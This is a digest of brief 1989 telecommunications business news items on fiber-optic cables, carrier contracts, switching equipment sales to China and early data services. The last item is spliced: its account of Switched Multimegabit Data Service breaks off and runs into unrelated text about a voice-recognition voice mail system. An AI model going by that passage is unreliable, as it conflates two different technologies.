|
|||
|
|
|||
|
March 10-12, 1989
|
|||
|
|
|||
|
SPRINT SIGNS ATLANTIC DEAL:
|
|||
|
|
|||
|
Cable & Wireless and US Sprint Thursday announced that US
|
|||
|
|
|||
|
Sprint will acquire the USA end of the PTAT transatlantic
|
|||
|
|
|||
|
fiber-optic cable system. Also: The 2 companies have formed an
|
|||
|
|
|||
|
alliance to jointly develop advanced global telecommunication
|
|||
|
|
|||
|
services. PTAT is the first privately built transatlantic
|
|||
|
|
|||
|
fiber-optic cable. It will link the USA and Britain. (From the USA
|
|||
|
|
|||
|
TODAY Money section.)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SPRINT GETS HALF INTEREST:
|
|||
|
|
|||
|
The alliance between US Sprint and Cable & Wireless will be
|
|||
|
|
|||
|
named GLOBAL FON. Also: US Sprint has agreed to acquire the
|
|||
|
|
|||
|
complete interest of the Washington-based Private Transatlantic
|
|||
|
|
|||
|
Telecommunications Systems in the PTAT transatlantic cable system.
|
|||
|
|
|||
|
The acquisition, which is subject to FCC approval, will give US
|
|||
|
|
|||
|
Sprint a 50% interest in PTAT along with Cable and Wireless.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
NEW SERVICE OFFERS IVPN:
|
|||
|
|
|||
|
Among the first services to be jointly developed by GLOBAL FON
|
|||
|
|
|||
|
by Cable & Wireless and US Sprint will be an international virtual
|
|||
|
|
|||
|
private network (IVPN) based on Sprint's VPN and a GLOBAL FONCARD
|
|||
|
|
|||
|
based on Sprint's travel service, the FONCARD. The alliance will
|
|||
|
|
|||
|
also develop international private line services offering
|
|||
|
|
|||
|
customers a variety of enhanced features and capabilities.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ARTEL SYSTEM TO SELL IN JAPAN:
|
|||
|
|
|||
|
NKK Corp., one of Japan's largest industrial concerns with
|
|||
|
|
|||
|
annual revenues of $8 billion, will be licensed to manufacture and
|
|||
|
|
|||
|
sell Artel Communication's 100 Mbps fiber optic local area network
|
|||
|
|
|||
|
system, FiberWay, in Japan, the companies said Thursday. Also: NKK
|
|||
|
|
|||
|
becomes the authorized distributor for Artel's fiber optic video
|
|||
|
|
|||
|
and graphics transmission system products.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FLORIDA SITE PLUGGED INTO FIBER:
|
|||
|
|
|||
|
The latest development in fiber optic technology is bringing
|
|||
|
|
|||
|
fiber to the home, Southern Bell says. Heathrow, a mixed use
|
|||
|
|
|||
|
development north of Orlando, Fla., is on the leading edge of
|
|||
|
|
|||
|
fiber-to-the-home efforts. At Heathrow, residents will receive
|
|||
|
|
|||
|
voice, data and video over the same fiber system. The system
|
|||
|
|
|||
|
points to the day when optical fiber will be possible over all
|
|||
|
|
|||
|
telephones.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
AREA SET FOR VOICE-ONLY FIBER:
|
|||
|
|
|||
|
The first widespread appearance of optical fiber to the home
|
|||
|
|
|||
|
will be traditional voice lines, Southern Bell says. The company
|
|||
|
|
|||
|
will begin using fiber for voice-only delivery later this year in
|
|||
|
|
|||
|
Governor's Island, north of Charlotte, N.C., and several other
|
|||
|
|
|||
|
locations. Studies show that fiber systems to carry voice to the
|
|||
|
|
|||
|
home will be more economical than copper by the early 1990s.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FIBER IS GOING SINGLE-MODE:
|
|||
|
|
|||
|
Southern Bell uses fiber systems that operate at up to 1.2
|
|||
|
|
|||
|
billion digital bits a second on a single fiber (the equivalent of
|
|||
|
|
|||
|
more than 16,000 simultaneous voice conversations), the firm says.
|
|||
|
|
|||
|
Since 1985, most of the optical fiber placed in Southern Bell has
|
|||
|
|
|||
|
been single-mode, which has a thinner core than its multi-mode
|
|||
|
|
|||
|
counterpart, keeping lightwaves traveling in a straight path.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CHEVRON CHOOSES TELECOM SUPPLIER:
|
|||
|
|
|||
|
Chevron Information Technology Co. (CITC) has selected Northern
|
|||
|
|
|||
|
Telecom as its sole supplier of telecommunications equipment,
|
|||
|
|
|||
|
company officials said Thursday. The $8.4 million dollar agreement
|
|||
|
|
|||
|
was reached in association with PacTel Meridian Systems, which
|
|||
|
|
|||
|
will provide the equipment and services to Chevron. Most of the
|
|||
|
|
|||
|
PBXs will be located in California, Louisiana and Texas.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SOFTWARE PROCESSES AND MONITORS:
|
|||
|
|
|||
|
IBM has introduced 2 products to help customers better manage
|
|||
|
|
|||
|
and use telecommunications facilities. At $90,000, Network Call
|
|||
|
|
|||
|
Accounting can process call detail records from multiple voice
|
|||
|
|
|||
|
switches. Expenses can be charged to a department or an extension.
|
|||
|
|
|||
|
Voice Network Design is a software program that lets customers
|
|||
|
|
|||
|
monitor the cost-effectiveness of transmission facilities.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
March 15, 1989
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SEARS STICKS WITH SPRINT:
|
|||
|
|
|||
|
US Sprint has signed a multi-million dollar communications
|
|||
|
|
|||
|
services agreement with Sears Technology Services Inc., the
|
|||
|
|
|||
|
corporate information organization of Sears, Roebuck and Co. The
|
|||
|
|
|||
|
agreement extends and enhances an agreement previously reached
|
|||
|
|
|||
|
between Sears and US Sprint in 1986 and makes STS one of US
|
|||
|
|
|||
|
Sprint's largest users.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
20,000 SEARS SITES COVERED:
|
|||
|
|
|||
|
A new agreement with Sears Technology Services will make US
|
|||
|
|
|||
|
Sprint the primary carrier of interLATA long-distance services for
|
|||
|
|
|||
|
Sears. Specific terms of the contract were not disclosed. However,
|
|||
|
|
|||
|
officials of both companies said US Sprint would link
|
|||
|
|
|||
|
approximately 20,000 Sears locations throughout the country. Most
|
|||
|
|
|||
|
US Sprint products and services are covered under the agreement.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
DIGITAL SWITCHES GO TO CHINA:
|
|||
|
|
|||
|
Ericsson has signed a general agreement with China for AXE
|
|||
|
|
|||
|
digital switching equipment expected to lead to contracts worth
|
|||
|
|
|||
|
$31 million in the first stage. The agreement was signed by
|
|||
|
|
|||
|
Ericsson Australia with the Ningbo Post and Telecommunications
|
|||
|
|
|||
|
Bureau and the Ningbo Telephone Co. Ericsson will supply 12
|
|||
|
|
|||
|
digital AXE switches, including local subscriber and trunk lines,
|
|||
|
|
|||
|
to Ningbo.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
TELEPHONE AND TERMINAL LINKED:
|
|||
|
|
|||
|
Digital Equipment and Northern Telecom yesterday unveiled new
|
|||
|
|
|||
|
communications capabilities to integrate voice and data
|
|||
|
|
|||
|
information resources at the desk top, linking the telephone and
|
|||
|
|
|||
|
the terminal as a single tool. Featured: When a customer
|
|||
|
|
|||
|
assistance representative answers the phone, pertinent information
|
|||
|
|
|||
|
concerning the caller can be automatically displayed on the
|
|||
|
|
|||
|
terminal.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ELECTRICAL PROBLEM FOUND:
|
|||
|
|
|||
|
A potential electrical glitch on the shuttle Discovery poses no
|
|||
|
|
|||
|
danger to the crew but may force it to return a day early. The
|
|||
|
|
|||
|
crew successfully launched a a $100 million Tracking and Data
|
|||
|
|
|||
|
Relay Satellite into orbit Monday. The problem: High pressure in
|
|||
|
|
|||
|
one of 3 fuel cells - used to produce electricity. NASA decides
|
|||
|
|
|||
|
tomorrow when to end the mission. (From the USA TODAY News
|
|||
|
|
|||
|
section.)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CALLS MADE ON THE COMPUTER:
|
|||
|
|
|||
|
An integrated message desk capability that automatically links
|
|||
|
|
|||
|
message taking to electronic mail or voice store and forward mail
|
|||
|
|
|||
|
is included in a new communications system from Digital Equipment
|
|||
|
|
|||
|
and Northern Telecom. Also included: Computer screen dialing that
|
|||
|
|
|||
|
enables a user to key in the name of the party to be called. It
|
|||
|
|
|||
|
can be used for office communications, telemarketing and other
|
|||
|
|
|||
|
calls.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
BELLATRIX JOINS THE FIELD:
|
|||
|
|
|||
|
Bellatrix Corp., a publicly owned company, said yesterday it
|
|||
|
|
|||
|
will enter the field of telecommunications through its wholly
|
|||
|
|
|||
|
owned subsidiary, Bellatrix Communications Inc. It will offer
|
|||
|
|
|||
|
turnkey 900 interactive data and information services, including
|
|||
|
|
|||
|
connection and termination. Bellatrix expects the services to be
|
|||
|
|
|||
|
operational in May.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CHINA GETS 8,000 NEW LINES:
|
|||
|
|
|||
|
Northern Telecom put into service yesterday its first DMS-100
|
|||
|
|
|||
|
digital switching system in the People's Republic of China. The
|
|||
|
|
|||
|
system will provide 8,000 lines of telecommunications service to 3
|
|||
|
|
|||
|
cities in Jiangxi province, about 900 miles south of Beijing.
|
|||
|
|
|||
|
Features such as direct dial services will now be available to
|
|||
|
|
|||
|
local subscribers.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
LARGEST SYSTEM SERVES PINGXIANG:
|
|||
|
|
|||
|
The main Northern Telecom system that opened yesterday in China
|
|||
|
|
|||
|
consists of 6,000 telephone lines for subscribers in Pingxiang.
|
|||
|
|
|||
|
The Pingxiang system is part of a $6 million contract announced in
|
|||
|
|
|||
|
1987 through which Northern Telecom will supply its DMS-100 and
|
|||
|
|
|||
|
DMS-10, with a capacity of 10,000 lines, to the Jiangxi PTA for
|
|||
|
|
|||
|
telecommunications services in 4 Chinese cities.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
PACTEL HEAD MADE A DIRECTOR:
|
|||
|
|
|||
|
Sam Ginn, chairman and chief executive officer of Pacific
|
|||
|
|
|||
|
Telesis Group, has been elected a director of Transamerica Corp.,
|
|||
|
|
|||
|
it was announced yesterday. Ginn, 51, has been chairman and chief
|
|||
|
|
|||
|
executive officer of Pacific Telesis since April 1988. Previously
|
|||
|
|
|||
|
he held the position of president and chief operating officer.
|
|||
|
|
|||
|
Ginn began his business career in 1960 with AT&T.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
March 17-19, 1989
|
|||
|
|
|||
|
|
|||
|
|
|||
|
YELLOW PAGES ARE FOR NIGHT OWLS:
|
|||
|
|
|||
|
Pacific Bell assembled a separate yellow page section of
|
|||
|
|
|||
|
businesses open after 6 p.m. The first one, due out this month in
|
|||
|
|
|||
|
San Jose, Calif., has 199 listings - everything from 24-hour
|
|||
|
|
|||
|
salons to an all-night notary public. Officials say this is a
|
|||
|
|
|||
|
first-of-its-kind listing to be included in telephone books in 29
|
|||
|
|
|||
|
California communities by May 1990.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
March 21, 1989
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CORDLESS PHONES CALL POLICE:
|
|||
|
|
|||
|
Some Cleveland, Ohio, residents with cordless phones are
|
|||
|
|
|||
|
alarmed to find police at their doors asking, "What's the
|
|||
|
|
|||
|
problem?" The problem: Cordless phones with weak batteries send
|
|||
|
|
|||
|
out pulses that sometimes automatically dial the emergency number
|
|||
|
|
|||
|
911. (From the USA TODAY News section.)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ALLTEL CLAIMS STAKE IN CELLULAR:
|
|||
|
|
|||
|
ALLTEL Mobile Communications said yesterday that it has
|
|||
|
|
|||
|
completed its purchase of Kansas Cellular Telephone Co.'s 40%
|
|||
|
|
|||
|
interest in the Wichita, Kan., wireline cellular system. ALLTEL
|
|||
|
|
|||
|
Mobile will be a limited partner in the Wichita SMSA partnership.
|
|||
|
|
|||
|
Southwestern Bell Mobile Systems is the general partner and
|
|||
|
|
|||
|
operator of the system.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
DIGITAL SYSTEM GOES VIA SW BELL:
|
|||
|
|
|||
|
Southwestern Bell Telecom will distribute Northern Telecom's
|
|||
|
|
|||
|
Meridian Norstar digital key system, company officials announced
|
|||
|
|
|||
|
yesterday. Southwestern Bell Telecom will market the Meridian
|
|||
|
|
|||
|
Norstar in Missouri, Kansas, Oklahoma, Arkansas and Texas.
|
|||
|
|
|||
|
Meridian Norstar is a small business communications system which
|
|||
|
|
|||
|
offers voice and data communications capabilities.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
GTE AWARDS RADIO CONTRACT:
|
|||
|
|
|||
|
Ericsson Radar Electronics of Sweden has received a $55 million
|
|||
|
|
|||
|
contract from GTE Government Systems Corp. to deliver mobile
|
|||
|
|
|||
|
microwave radios to the corporation's Mobile Subscriber Equipment
|
|||
|
|
|||
|
Division in Taunton, Mass. Designated MF15, the 15 GHz
|
|||
|
|
|||
|
down-the-hill radios have a transmission capacity of 256 - 4096
|
|||
|
|
|||
|
kbit/s. They were developed by Ericsson and Marconi Italiana.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
EXCHANGE TO CARRY ISDN CIRCUIT:
|
|||
|
|
|||
|
Network Equipment Technologies Inc. said yesterday that its
|
|||
|
|
|||
|
Integrated Digital Network Exchange has become the first product
|
|||
|
|
|||
|
of its kind to be certified to carry an ISDN primary rate circuit
|
|||
|
|
|||
|
(23B plus D) between 2 Northern Telecom Meridian SL-1 private
|
|||
|
|
|||
|
branch exchanges. The announcement came after successful testing
|
|||
|
|
|||
|
conducted recently by Northern Telecom at its facility in Santa
|
|||
|
|
|||
|
Clara, Calif.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
COMSAT TO DEVELOP NETWORK:
|
|||
|
|
|||
|
COMSAT Corp.'s Systems Division has been awarded a $16.9
|
|||
|
|
|||
|
million contract by the Turkish Postal Telephone and Telegraph
|
|||
|
|
|||
|
agency to modernize U.S. military communications in the
|
|||
|
|
|||
|
Mediterranean area. Designed and funded by the U.S. Defense
|
|||
|
|
|||
|
Communications Agency, the 5-year program calls for COMSAT to
|
|||
|
|
|||
|
perform systems engineering and integration for a new digital
|
|||
|
|
|||
|
wideband satellite-based network.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SYSTEM TO REPLACE TURKEY SITES:
|
|||
|
|
|||
|
A new COMSAT system known as "DMIP I" (DCA Mediterranean
|
|||
|
|
|||
|
Improvement Program Phase I) is the first of a series designed to
|
|||
|
|
|||
|
improve Mediterranean area U.S. military communications over the
|
|||
|
|
|||
|
next several years. Each of DMIP I's 6 Earth stations, located at
|
|||
|
|
|||
|
major U.S. defense installations throughout Turkey, will
|
|||
|
|
|||
|
eventually replace the antiquated troposcatter sites.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
RURAL WISCONSIN WILL GET TDS:
|
|||
|
|
|||
|
Telephone and Data Systems Inc. says that as a result of FCC
|
|||
|
|
|||
|
lotteries held this week it expects to have an interest in
|
|||
|
|
|||
|
cellular systems serving 2 Rural Service Areas in Wisconsin. The
|
|||
|
|
|||
|
systems will serve southwestern and central Wisconsin and the
|
|||
|
|
|||
|
major state highways to the west and southwest of Madison, Wis.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FIBER OPTICS HAVE MILITARY USE:
|
|||
|
|
|||
|
The Communications Product Division of Microwave Modules and
|
|||
|
|
|||
|
Devices and Codenoll Technology have announced an agreement to
|
|||
|
|
|||
|
offer rugged and militarized versions of Codenoll's fiber optic
|
|||
|
|
|||
|
Ethernet Local Area Network products for military/federal Tempest
|
|||
|
|
|||
|
applications. It gives the firms rights to use and modify
|
|||
|
|
|||
|
Codenoll's designs according to military standards.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
March 31-April 2, 1989
|
|||
|
|
|||
|
|
|||
|
|
|||
|
LINES ARE PICTURE PERFECT:
|
|||
|
|
|||
|
Telephone lines are being used to send images from electronic
|
|||
|
|
|||
|
still cameras to newspapers and companies. The camera captures
|
|||
|
|
|||
|
images on a tiny computer disk instead of film. A transmitter
|
|||
|
|
|||
|
sends the image over phone lines in 3 1/2 minutes or less. Once
|
|||
|
|
|||
|
received, the image can be stored on a disk or printed on paper.
|
|||
|
|
|||
|
(From the USA TODAY Money section.)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FRENCH LINE GOES SILENT:
|
|||
|
|
|||
|
In operation only 3 months, the TAT-8 trans-Atlantic fiber
|
|||
|
|
|||
|
optic system reaching into France needed to be closed down last
|
|||
|
|
|||
|
week for repairs. Suspected cause: Trawling lines in the Atlantic.
|
|||
|
|
|||
|
During the restoration, the International Telecommunications
|
|||
|
|
|||
|
Satellite Organization carries the international traffic. TAT-8 is
|
|||
|
|
|||
|
owned by AT&T, France Telecom and British Telecom.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
NYNEX SUPPORTS HIGH-SPEED DATA:
|
|||
|
|
|||
|
NYNEX said Thursday that it supports proposed generic
|
|||
|
|
|||
|
requirements for a new high-speed data communications service.
|
|||
|
|
|||
|
Known as Switched Multimegabit Data Service, the system is
|
|||
|
|
|||
|
scheduled to be available as early as 1991. SMDS will interconnect
|
|||
|
|
|||
|
local area networks (LANs) by providing broadband transport across
|
|||
|
|
|||
|
a metropolitan area using public, packet-switched networks.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SYSTEM HAS POTENTIAL:
|
|||
|
|
|||
|
Designed to make use of evolving metropolitan-area network
|
|||
|
|
|||
|
standards and technology, the new Switched Multimegabit Data
|
|||
|
|
|||
|
Service will provide customer voice commands or touchtone signals.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
When a user calls the TeleCenter, he or she is prompted to give a name and
|
|||
|
|
|||
|
password. A voice entry feature searches its "user profile" records for a
|
|||
|
|
|||
|
voice pattern matching that of the caller.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
If the caller is identified as an authorized user, the caller's stored
|
|||
|
|
|||
|
templates are loaded, allowing the user to communicate with the voice mail
|
|||
|
|
|||
|
system entirely by voice.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|